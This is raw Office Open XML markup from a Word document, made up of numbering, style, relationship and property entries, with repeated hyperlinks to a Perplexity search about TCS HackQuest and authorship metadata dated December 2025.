    <w:tmpl w:val="3F4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E76B2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C8B6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669AE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2A2E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F3740"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BAAA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25100"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6F4E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7108D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="608A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E5D6C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6B0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16563"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A21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221ECA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B80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DC503D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E71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4237E9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4CCC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B2845"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0DE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622F9E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0F64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20EBB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="850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DC31E7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="408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071A4F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DE1C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A6F5C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CDEA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242A6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="476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101F9A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="29F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C75F2F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="922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996CA4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5CB8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0866CF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D11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600474">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="135800658">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="964892416">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="822627645">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1282959828">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="435753477">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="169880854">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1758866628">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="2053991760">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1444232491">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1373846569">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1477913261">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1679111742">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="877595163">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1339691813">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1361936235">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="752315199">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1205748149">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1257589666">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1136290153">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="2141915913">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="96038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D8"/>
    <w:rsid w:val="004B4F83"/>
    <w:rsid w:val="006909D9"/>
    <w:rsid w:val="009D6264"/>
    <w:rsid w:val="00BB73ED"/>
    <w:rsid w:val="00C91A8C"/>
    <w:rsid w:val="00DC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F543"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{107C1326-FEAA-4D86-9C5C-D9721F90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7D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91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y-2">
    <w:name w:val="my-2"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00C91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A8C"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="py-0">
    <w:name w:val="py-0"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00C91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91A8C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C91A8C"/>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C91A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A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A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91A8C"/>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00C91A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need-help-with-tcs-hackquest-rT0CnJ.eRBeFbxT25e4ajw?preview=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need-help-with-tcs-hackquest-rT0CnJ.eRBeFbxT25e4ajw?preview=1" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.perplexity.ai/search/need-help-with-tcs-hackquest-rT0CnJ.eRBeFbxT25e4ajw?preview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need-help-with-tcs-hackquest-rT0CnJ.eRBeFbxT25e4ajw?preview=1" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.perplexity.ai/search/need-help-with-tcs-hackquest-rT0CnJ.eRBeFbxT25e4ajw?preview=1" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.perplexity.ai/search/need-help-with-tcs-hackquest-rT0CnJ.eRBeFbxT25e4ajw?preview=1" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.perplexity.ai/search/need-help-with-tcs-hackquest-rT0CnJ.eRBeFbxT25e4ajw?preview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need-help-with-tcs-hackquest-rT0CnJ.eRBeFbxT25e4ajw?preview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5844</Words>
  <Characters>33313</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>277</Lines>
  <Paragraphs>78</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>39079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tiruveedula</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Manas tiruveedula</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-12-13T15:09:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-13T15:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>